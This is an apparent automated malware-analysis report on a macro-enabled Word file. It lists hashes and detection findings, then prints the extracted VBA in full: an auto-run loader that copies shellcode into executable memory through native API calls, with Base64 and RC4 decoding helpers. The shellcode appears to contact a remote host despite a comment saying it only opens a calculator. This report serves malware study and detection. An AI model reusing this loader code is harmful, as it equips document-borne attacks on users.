Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae3b37a68871c3d8…

MALICIOUS

Office (OOXML)

Size: 47.5 KB
Created: 2021-01-05 15:36:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-01-23
MD5: 320d982ec328a73579dd628bcb51621e
SHA-1: 9ff897bab75b0adf60fad9cdbb14f5a1ea39d7ee
SHA-256: ae3b37a68871c3d8d71064efd573d52cc45c602bd4220fd1e766691bc6ae959b
Risk Score: 130

Heuristics 5

  • VBA project inside OOXML (severity: medium, 3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA native-memory callback shellcode loader (severity: critical) OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER
    VBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.
    Matched line in script:
        lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(Shellcode3), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.freevbcode.com/ShowCode.asp?ID=1863  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  In document text (OOXML body / shared strings)
    • http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html  In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source from OOXML)  17238 bytes
SHA-256: f8bf449b33fb50b941f17c4d590eed611ad60b5edd1081c9ab95188f732b7e98
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OldIsNew"
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long

'Credits
'http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html
'http://www.freevbcode.com/ShowCode.asp?ID=1863
  
Sub Sheldon()
    
    Dim lpMemory As Long
    Dim lResult As Long
    Dim bytestowrite As String
    Dim sizeShellcode As Integer
    Dim sizeShellcode2 As Integer
    'Shellcode pops calc.exe
    Shellcode = Array(Chr(&HFC), Chr(&HE8), Chr(&H89), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H60), Chr(&H89), Chr(&HE5), Chr(&H31), Chr(&HD2), Chr(&H64), Chr(&H8B), Chr(&H52), Chr(&H30), Chr(&H8B), Chr(&H52), Chr(&HC), Chr(&H8B), Chr(&H52), Chr(&H14), Chr(&H8B), Chr(&H72), Chr(&H28), Chr(&HF), Chr(&HB7), Chr(&H4A), Chr(&H26), Chr(&H31), Chr(&HFF), Chr(&H31), Chr(&HC0), Chr(&HAC), Chr(&H3C), _
Chr(&H61), Chr(&H7C), Chr(&H2), Chr(&H2C), Chr(&H20), Chr(&HC1), Chr(&HCF), Chr(&HD), Chr(&H1), Chr(&HC7), Chr(&HE2), Chr(&HF0), Chr(&H52), Chr(&H57), Chr(&H8B), Chr(&H52), Chr(&H10), Chr(&H8B), Chr(&H42), Chr(&H3C), Chr(&H1), Chr(&HD0), Chr(&H8B), Chr(&H40), Chr(&H78), Chr(&H85), Chr(&HC0), Chr(&H74), Chr(&H4A), Chr(&H1), Chr(&HD0), Chr(&H50), Chr(&H8B), Chr(&H48), Chr(&H18), _
Chr(&H8B), Chr(&H58), Chr(&H20), Chr(&H1), Chr(&HD3), Chr(&HE3), Chr(&H3C), Chr(&H49), Chr(&H8B), Chr(&H34), Chr(&H8B), Chr(&H1), Chr(&HD6), Chr(&H31), Chr(&HFF), Chr(&H31), Chr(&HC0), Chr(&HAC), Chr(&HC1), Chr(&HCF), Chr(&HD), Chr(&H1), Chr(&HC7), Chr(&H38), Chr(&HE0), Chr(&H75), Chr(&HF4), Chr(&H3), Chr(&H7D), Chr(&HF8), Chr(&H3B), Chr(&H7D), Chr(&H24), Chr(&H75), Chr(&HE2), _
Chr(&H58), Chr(&H8B), Chr(&H58), Chr(&H24), Chr(&H1), Chr(&HD3), Chr(&H66), Chr(&H8B), Chr(&HC), Chr(&H4B), Chr(&H8B), Chr(&H58), Chr(&H1C), Chr(&H1), Chr(&HD3), Chr(&H8B), Chr(&H4), Chr(&H8B), Chr(&H1), Chr(&HD0), Chr(&H89), Chr(&H44), Chr(&H24), Chr(&H24), Chr(&H5B), Chr(&H5B), Chr(&H61), Chr(&H59), Chr(&H5A), Chr(&H51), Chr(&HFF), Chr(&HE0), Chr(&H58), Chr(&H5F), Chr(&H5A), _
Chr(&H8B), Chr(&H12), Chr(&HEB), Chr(&H86), Chr(&H5D), Chr(&H68), Chr(&H6E), Chr(&H65), Chr(&H74), Chr(&H0), Chr(&H68), Chr(&H77), Chr(&H69), Chr(&H6E), Chr(&H69), Chr(&H54), Chr(&H68), Chr(&H4C), Chr(&H77), Chr(&H26), Chr(&H7), Chr(&HFF), Chr(&HD5), Chr(&HE8), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H31), Chr(&HFF), Chr(&H57), Chr(&H57), Chr(&H57), Chr(&H57), Chr(&H57), _
Chr(&H68), Chr(&H3A), Chr(&H56), Chr(&H79), Chr(&HA7), Chr(&HFF), Chr(&HD5), Chr(&HE9), Chr(&HA4), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H5B), Chr(&H31), Chr(&HC9), Chr(&H51), Chr(&H51), Chr(&H6A), Chr(&H3), Chr(&H51), Chr(&H51), Chr(&H68), Chr(&HBB), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&H53), Chr(&H50), Chr(&H68), Chr(&H57), Chr(&H89), Chr(&H9F), Chr(&HC6), Chr(&HFF), Chr(&HD5), _
Chr(&H50), Chr(&HE9), Chr(&H8C), Chr(&H0), Chr(&H31), Chr(&HD2), Chr(&H52), Chr(&H68), Chr(&H0), Chr(&H32), Chr(&HC0), Chr(&H84), Chr(&H52), Chr(&H52), Chr(&H52), Chr(&H53), Chr(&H52), Chr(&H50), Chr(&H68), Chr(&HEB), Chr(&H55), Chr(&H2E), Chr(&H3B), Chr(&HFF), Chr(&HD5), Chr(&H89), Chr(&HC6), Chr(&H83), Chr(&HC3), Chr(&H50), Chr(&H68), Chr(&H80), _
Chr(&H33), Chr(&H0), Chr(&H0), Chr(&H89), Chr(&HE0), Chr(&H6A), Chr(&H4), Chr(&H50), Chr(&H6A), Chr(&H1F), Chr(&H56), Chr(&H68), Chr(&H75), Chr(&H46), Chr(&H9E), Chr(&H86), Chr(&HFF), Chr(&HD5), Chr(&H5F), Chr(&H31), Chr(&HFF), Chr(&H57), Chr(&H57), Chr(&H6A), Chr(&HFF), Chr(&H53), Chr(&H56), Chr(&H68), Chr(&H2D), Chr(&H6), Chr(&H18), Chr(&H7B), Chr(&HFF), Chr(&HD5), Chr(&H85), _
Chr(&HC0), Chr(&HF), Chr(&H84), Chr(&HCA), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&H31), Chr(&HFF), Chr(&H85), Chr(&HF6), Chr(&H74), Chr(&H4), Chr(&H89), Chr(&HF9), Chr(&HEB), Chr(&H9), Chr(&H68), Chr(&HAA), Chr(&HC5), Chr(&HE2), Chr(&H5D), Chr(&HFF), Chr(&HD5), Chr(&H89), Chr(&HC1), Chr(&H68), Chr(&H45), Chr(&H21), Chr(&H5E), Chr(&H31), Chr(&HFF), Chr(&HD5), Chr(&H31), Chr(&HFF), _
Chr(&H57), Chr(&H6A), Chr(&H7), Chr(&H51), Chr(&H56), Chr(&H50), Chr(&H68), Chr(&HB7), Chr(&H57), Chr(&HE0), Chr(&HB), Chr(&HFF), Chr(&HD5), Chr(&HBF), Chr(&H0), Chr(&H2F), Chr(&H0), Chr(&H0), Chr(&H39), Chr(&HC7), Chr(&H75), Chr(&H7), Chr(&H58), Chr(&H50), Chr(&HE9), Chr(&H7B), Chr(&HFF), Chr(&HFF), Chr(&HFF), Chr(&H31), Chr(&HFF), Chr(&HE9), Chr(&H91), Chr(&H1), Chr(&H0), _
Chr(&H0), Chr(&HE9), Chr(&HC9), Chr(&H1), Chr(&H0), Chr(&H0), Chr(&HE8), Chr(&H6F), Chr(&HFF), Chr(&HFF), Chr(&HFF), Chr(&H2F), Chr(&H36), Chr(&H6F), Chr(&H68), Chr(&H4F), Chr(&H0), Chr(&H15), Chr(&HB1), Chr(&H1D), Chr(&H3C), Chr(&H80), Chr(&H56), Chr(&H5E), Chr(&H15), Chr(&HF7), Chr(&H8F), Chr(&H3A), Chr(&HF9), Chr(&HC8), Chr(&HD0), Chr(&H81), Chr(&H93), Chr(&H76), Chr(&HF7))

    Shellcode2 = Array(Chr(&H30), Chr(&HCE), Chr(&H6D), Chr(&H6B), Chr(&H10), Chr(&HC8), Chr(&HE2), Chr(&H96), Chr(&HE8), Chr(&H97), Chr(&H1F), Chr(&H55), Chr(&H76), Chr(&H1B), Chr(&H2E), Chr(&H63), Chr(&HF), Chr(&HC0), Chr(&HE2), Chr(&H7A), Chr(&H3A), Chr(&H92), Chr(&HED), Chr(&HB8), Chr(&HC9), Chr(&H50), Chr(&HCD), Chr(&HBD), Chr(&HBF), Chr(&HA0), Chr(&H80), Chr(&H33), Chr(&H89), Chr(&H15), Chr(&HA), _
Chr(&HB8), Chr(&HEC), Chr(&HBA), Chr(&HFB), Chr(&HFA), Chr(&H92), Chr(&H65), Chr(&HE2), Chr(&H71), Chr(&H5), Chr(&H9A), Chr(&H23), Chr(&HFA), Chr(&H90), Chr(&HF), Chr(&HC7), Chr(&HCB), Chr(&H8D), Chr(&HFA), Chr(&H9B), Chr(&H0), Chr(&H55), Chr(&H73), Chr(&H65), Chr(&H72), Chr(&H2D), Chr(&H41), Chr(&H67), Chr(&H65), Chr(&H6E), Chr(&H74), Chr(&H3A), Chr(&H20), Chr(&H4D), Chr(&H6F), _
Chr(&H7A), Chr(&H69), Chr(&H6C), Chr(&H6C), Chr(&H61), Chr(&H2F), Chr(&H35), Chr(&H2E), Chr(&H30), Chr(&H20), Chr(&H28), Chr(&H57), Chr(&H69), Chr(&H6E), Chr(&H64), Chr(&H6F), Chr(&H77), Chr(&H73), Chr(&H20), Chr(&H4E), Chr(&H54), Chr(&H20), Chr(&H36), Chr(&H2E), Chr(&H31), Chr(&H3B), Chr(&H20), Chr(&H57), Chr(&H4F), Chr(&H57), Chr(&H36), Chr(&H34), Chr(&H3B), Chr(&H20), Chr(&H54), _
Chr(&H72), Chr(&H69), Chr(&H64), Chr(&H65), Chr(&H6E), Chr(&H74), Chr(&H2F), Chr(&H37), Chr(&H2E), Chr(&H30), Chr(&H3B), Chr(&H20), Chr(&H72), Chr(&H76), Chr(&H3A), Chr(&H31), Chr(&H31), Chr(&H2E), Chr(&H30), Chr(&H29), Chr(&H20), Chr(&H6C), Chr(&H69), Chr(&H6B), Chr(&H65), Chr(&H20), Chr(&H47), Chr(&H65), Chr(&H63), Chr(&H6B), Chr(&H6F), Chr(&HD), Chr(&HA), Chr(&H0), Chr(&HAD), _
Chr(&HD7), Chr(&H81), Chr(&H50), Chr(&H91), Chr(&HD2), Chr(&H63), Chr(&HD7), Chr(&H35), Chr(&H3), Chr(&HA), Chr(&H55), Chr(&HB7), Chr(&HD5), Chr(&H1A), Chr(&H57), Chr(&HCB), Chr(&HD), Chr(&HDF), Chr(&HDF), Chr(&H7F), Chr(&HAA), Chr(&H40), Chr(&HB2), Chr(&H7D), Chr(&H48), Chr(&H8F), Chr(&HF8), Chr(&H85), Chr(&HB3), Chr(&HF7), Chr(&HAB), Chr(&HBC), Chr(&HEE), Chr(&H11), Chr(&HAD), _
Chr(&H49), Chr(&H4E), Chr(&H3B), Chr(&H5E), Chr(&HE2), Chr(&H3B), Chr(&HC0), Chr(&H8D), Chr(&H50), Chr(&H12), Chr(&H63), Chr(&HC7), Chr(&HEB), Chr(&H83), Chr(&H9C), Chr(&HC6), Chr(&HC4), Chr(&H7E), Chr(&HD), Chr(&HA5), Chr(&H5F), Chr(&H1C), Chr(&H96), Chr(&H43), Chr(&HB5), Chr(&HAB), Chr(&H14), Chr(&HA8), Chr(&HCD), Chr(&H22), Chr(&H3B), Chr(&H4A), Chr(&H22), Chr(&HDF), Chr(&HDE), _
Chr(&H2A), Chr(&H89), Chr(&H93), Chr(&H8B), Chr(&HC3), Chr(&HA0), Chr(&H4E), Chr(&HDC), Chr(&H2), Chr(&H29), Chr(&H71), Chr(&HCE), Chr(&HBC), Chr(&HEC), Chr(&HD9), Chr(&H1C), Chr(&H21), Chr(&H3A), Chr(&HBD), Chr(&HB7), Chr(&H76), Chr(&H83), Chr(&H29), Chr(&H0), Chr(&HF6), Chr(&H4C), Chr(&H25), Chr(&H4F), Chr(&H7), Chr(&HA8), Chr(&H29), Chr(&H4E), Chr(&H1D), Chr(&HB3), Chr(&HBE), _
Chr(&H11), Chr(&HB2), Chr(&HB), Chr(&HAF), Chr(&H45), Chr(&H62), Chr(&HC1), Chr(&H16), Chr(&H4D), Chr(&HDA), Chr(&H65), Chr(&HDD), Chr(&HC2), Chr(&H7F), Chr(&H57), Chr(&HE8), Chr(&H80), Chr(&H59), Chr(&HDE), Chr(&HB2), Chr(&H95), Chr(&HF0), Chr(&HC2), Chr(&H6F), Chr(&HD5), Chr(&HB4), Chr(&HDA), Chr(&H3A), Chr(&H3B), Chr(&HAF), Chr(&H4B), Chr(&HEF), Chr(&H40), Chr(&H3), Chr(&HDE), _
Chr(&HE2), Chr(&H15), Chr(&H2D), Chr(&H41), Chr(&H5D), Chr(&HBF), Chr(&H6B), Chr(&H2C), Chr(&HF6), Chr(&H47), Chr(&HF1), Chr(&H6C), Chr(&HF0), Chr(&HEE), Chr(&H4F), Chr(&HB7), Chr(&H24), Chr(&H31), Chr(&H7D), Chr(&H93), Chr(&HBD), Chr(&HD7), Chr(&H4F), Chr(&H92), Chr(&H19), Chr(&HB8), Chr(&H47), Chr(&H2D), Chr(&H98), Chr(&H86), Chr(&H5A), Chr(&H85), Chr(&H1F), Chr(&HD0), Chr(&H6D), _
Chr(&H4A), Chr(&HF4), Chr(&HB0), Chr(&H7F), Chr(&HDF), Chr(&H2D), Chr(&H85), Chr(&H68), Chr(&HFE), Chr(&H4F), Chr(&H74), Chr(&HA5), Chr(&H8A), Chr(&H33), Chr(&HFE), Chr(&H3), Chr(&H76), Chr(&H23), Chr(&HDA), Chr(&HB9), Chr(&H47), Chr(&HBC), Chr(&H68), Chr(&H8D), Chr(&HD), Chr(&H17), Chr(&H33), Chr(&HAC), Chr(&H4), Chr(&HFB), Chr(&H56), Chr(&H42), Chr(&H47), Chr(&HA4), Chr(&HF8), _
Chr(&H13), Chr(&HB0), Chr(&HA0), Chr(&HAD), Chr(&HBD), Chr(&HCD), Chr(&H2F), Chr(&HDC), Chr(&HBF), Chr(&H0), Chr(&H68), Chr(&HF0), Chr(&HB5), Chr(&HA2), Chr(&H56), Chr(&HFF), Chr(&HD5), Chr(&H6A), Chr(&H40), Chr(&H68), Chr(&H0), Chr(&H10), Chr(&H0), Chr(&H0), Chr(&H68), Chr(&H0), Chr(&H0), Chr(&H40), Chr(&H0), Chr(&H57), Chr(&H68), Chr(&H58), Chr(&HA4), Chr(&H53), Chr(&HE5), _
Chr(&HFF), Chr(&HD5), Chr(&H93), Chr(&HB9), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H0), Chr(&H1), Chr(&HD9), Chr(&H51), Chr(&H53), Chr(&H89), Chr(&HE7), Chr(&H57), Chr(&H68), Chr(&H0), Chr(&H20), Chr(&H0), Chr(&H0), Chr(&H53), Chr(&H56), Chr(&H68), Chr(&H12), Chr(&H96), Chr(&H89), Chr(&HE2), Chr(&HFF), Chr(&HD5), Chr(&H85), Chr(&HC0), Chr(&H74), Chr(&HC6), Chr(&H8B), Chr(&H7), _
Chr(&H1), Chr(&HC3), Chr(&H75), Chr(&HE5), Chr(&H58), Chr(&HC3), Chr(&HE8), Chr(&H89), Chr(&HFD), Chr(&HFF), Chr(&HFF), Chr(&H61), Chr(&H6C), Chr(&H6C), Chr(&H2E), Chr(&H61), Chr(&H74), Chr(&H77), Chr(&H77), Chr(&H6E), Chr(&H65), Chr(&H74), Chr(&H2E), Chr(&H63), Chr(&H6F), Chr(&H6D), Chr(&H0), Chr(&H47), Chr(&H76), Chr(&H9F), Chr(&HFD))
    
    Dim Shellcode3() As String
    ' Shellcode 1: UBound = 383, so indices 0 to 383, so size = 384
    sizeShellcode = UBound(Shellcode) + 1
    For iShellcode = LBound(Shellcode) To UBound(Shellcode)
        ReDim Preserve Shellcode3(iShellcode)
        copyValue = Shellcode(iShellcode)
        Shellcode3(iShellcode) = copyValue
    Next iShellcode
    
    For iShellcode2 = LBound(Shellcode2) To UBound(Shellcode2)
        ReDim Preserve Shellcode3(iShellcode2 + sizeShellcode)
        copyValue = Shellcode2(iShellcode2)
        Shellcode3(sizeShellcode + iShellcode2) = copyValue
    Next iShellcode2
 
    lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(Shellcode3), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    
    For iArray = LBound(Shellcode3) To UBound(Shellcode3)
        bytestowrite = Shellcode3(iArray)
        lResult = stdCallA("kernel32", "RtlMoveMemory", vbLong, lpMemory + iArray, bytestowrite, 1)
    Next iArray
    'lResult = stdCallA("kernel32", "CreateThread", vbLong, 0&, 0&, lpMemory, 0&, 0&, 0&)

End Sub

Public Function stdCallA(sDll As String, sFunc As String, ByVal RetType As VbVarType, ParamArray P() As Variant)
    Dim i As Long, pFunc As Long, V(), HRes As Long
    ReDim V(0)
    V = P
    For i = 0 To UBound(V)
        If VarType(P(i)) = vbString Then P(i) = StrConv(P(i), vbFromUnicode): V(i) = StrPtr(P(i))
            VType(i) = VarType(V(i))
            VPtr(i) = VarPtr(V(i))
        Next i
    HRes = DispCallFunc(0, GetProcAddress(LoadLibrary(sDll), sFunc), CC_STDCALL, RetType, i, VType(0), VPtr(0), stdCallA)
End Function

Function retrievePayload()
    Set Content = ActiveDocument.Content
    Debug.Print Content
    'Decode64 Content
    'Decrypt RC4
    'Decode64 Content
End Function

Function formatPayload()

End Function

Sub AutoOpen()
    Sheldon
End Sub

Attribute VB_Name = "ComptabilityUtility"
Option Explicit

Private Const clOneMask = 16515072          '000000 111111 111111 111111
Private Const clTwoMask = 258048            '111111 000000 111111 111111
Private Const clThreeMask = 4032            '111111 111111 000000 111111
Private Const clFourMask = 63               '111111 111111 111111 000000

Private Const clHighMask = 16711680         '11111111 00000000 00000000
Private Const clMidMask = 65280             '00000000 11111111 00000000
Private Const clLowMask = 255               '00000000 00000000 11111111

Private Const cl2Exp18 = 262144             '2 to the 18th power
Private Const cl2Exp12 = 4096               '2 to the 12th
Private Const cl2Exp6 = 64                  '2 to the 6th
Private Const cl2Exp8 = 256                 '2 to the 8th
Private Const cl2Exp16 = 65536              '2 to the 16th

Public Function Decode64(ByVal sString As String) As String

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
    sString = Replace(sString, vbLf, vbNullString)      'either order.

    lTemp = Len(sString) Mod 4                          'Test for valid input.
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If

    If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
        iPad = 1
    End If

    For lTemp = 0 To 255                                'Fill the translation table.
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65              'A - Z
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71              'a - z
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4               '1 - 0
            Case 43
                bTrans(lTemp) = 62                      'Chr(43) = "+"
            Case 47
                bTrans(lTemp) = 63                      'Chr(47) = "/"
        End Select
    Next lTemp

    For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp

    bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
        lTemp = lQuad And clHighMask                    'Mask for the first byte
        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
        lTemp = lQuad And clMidMask                     'Mask for the second byte
        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
        lPos = lPos + 3
    Next lChar

    sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
    Decode64 = sOut

End Function

Function RunRC4(sMessage, strKey)
    Dim kLen, x, y, i, j, temp
    Dim s(256), k(256)
     
        'Init keystream
    kLen = Len(strKey)
    For i = 0 To 255
            s(i) = i
            k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
    Next
     
        j = 0
    For i = 0 To 255
            j = (j + k(i) + s(i)) Mod 256
            temp = s(i)
            s(i) = s(j)
            s(j) = temp
    Next
     
        x = 0
        y = 0
     
        'Drop n bytes from keystream
    For i = 1 To 3072
            x = (x + 1) Mod 256
            y = (y + s(x)) Mod 256
            temp = s(x)
            s(x) = s(y)
            s(y) = temp
    Next
     
        'Encode/Decode
    For i = 1 To Len(sMessage)
            x = (x + 1) Mod 256
            y = (y + s(x)) Mod 256
            temp = s(x)
            s(x) = s(y)
            s(y) = temp
     
            RunRC4 = RunRC4 & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
End Function
vbaProject_00.bin  vba-project  OOXML VBA project: word/vbaProject.bin  151040 bytes
SHA-256: a922ed66bcca7fe74c203b40f9c3af1d427cb0943e98e7e60badfee38b31af9c